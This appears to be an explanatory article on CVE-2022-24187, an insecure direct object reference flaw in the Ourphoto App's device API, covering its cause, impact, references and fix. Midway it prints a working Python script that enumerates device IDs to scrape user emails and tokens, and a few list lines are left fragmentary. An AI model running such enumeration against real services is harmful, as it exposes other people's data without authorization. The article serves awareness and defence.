CVE-2022-24187 is a security vulnerability discovered in version 1.4.1 of the Ourphoto App, a platform for photo sharing and digital picture frames. This flaw is categorized as an Insecure Direct Object Reference (IDOR) vulnerability. It affects the /device/* API endpoints, specifically due to the insufficient security checks around the user_id and device_id parameters.
This article explains how the vulnerability works, its possible impact, shows practical code examples for exploitation, and provides links to original references for further reading. The language used here is plain and clear, aimed at helping readers understand the risk and mechanisms, regardless of their level of cybersecurity experience.
What is an IDOR Vulnerability?
In a Direct Object Reference vulnerability, attackers simply change a part of a request—such as a user ID in the URL—to directly access data they shouldn’t see. These issues usually occur whenever developers reference objects by predictable IDs (for example, 12345 or 67890) in APIs, without checking if the current user actually owns or is allowed to access the object.
Details of the Vulnerability
In the Ourphoto App 1.4.1, the /device/* endpoints rely on user_id and device_id parameters for data access. However, the app fails to enforce that requests using these IDs must come from the actual device owner or legitimate user.
Example vulnerable endpoint
GET https://api.ourphotoapp.com/device/12345
Here, 12345 is the device_id. If an attacker guesses or enumerates these IDs simply by incrementing or decrementing, they can retrieve information belonging to other users or devices.
Any other information returned by these endpoints (profile details, device status, etc.)
This opens the door for privacy violations, targeted phishing, and possibly further exploitation, as tokens might be used to access or control the user's photo frames.
Exploiting CVE-2022-24187: Step-by-Step Example
Below is a code snippet using Python and the requests library, showing how an attacker might automate the enumeration of device data.
Install the required Python library
pip install requests
Example Exploit Script
import requests
API_URL = "https://api.ourphotoapp.com/device/";
START_ID = 10000 # This is a guess. Start from a valid device/user ID.
END_ID = 10100 # How many IDs to test.
for device_id in range(START_ID, END_ID):
url = f"{API_URL}{device_id}"
response = requests.get(url)
if response.status_code == 200 and "email" in response.text:
print(f"Device ID: {device_id}")
print(f"Response: {response.text}\n")
else:
print(f"Device ID {device_id} not found or unauthorized.")
Loops through a range of device IDs.
- Sends a GET request to the /device/<device_id> endpoint.
Prints out the exposed information.
Note: Properly coded endpoints would return a 401 (unauthorized) or 403 (forbidden) error, but due to the vulnerability, the server returns actual data for valid IDs regardless of the requester's identity.
Real-World Impact
If exploited, an attacker could download the full list of Ourphoto App user emails and frame tokens. These tokens could possibly allow them to interact with users’ digital photo frames, upload unauthorized images, or simply compromise user privacy.
The enumeration can be done at a large scale, because IDs are usually sequential (e.g., user 1001, 1002, 1003...), making mass scraping trivial.
References and Original Reports
- Mitre CVE entry: CVE-2022-24187
- Exploit-DB Entry
- Packet Storm Security Advisory
- OWASP IDOR Page
Conclusion
CVE-2022-24187 in Ourphoto App 1.4.1 shows how dangerous simple web and mobile API flaws can be. Lacking proper authorization allows anyone to easily grab sensitive user data, violating privacy and potentially compromising device security. Always patch your apps, and for developers: never trust user-supplied object identifiers without robust permission checks.
Feel free to share this post to help spread awareness about the risks of IDOR vulnerabilities in modern apps!
Timeline
Published on: 11/28/2022 22:15:00 UTC
Last modified on: 12/01/2022 23:21:00 UTC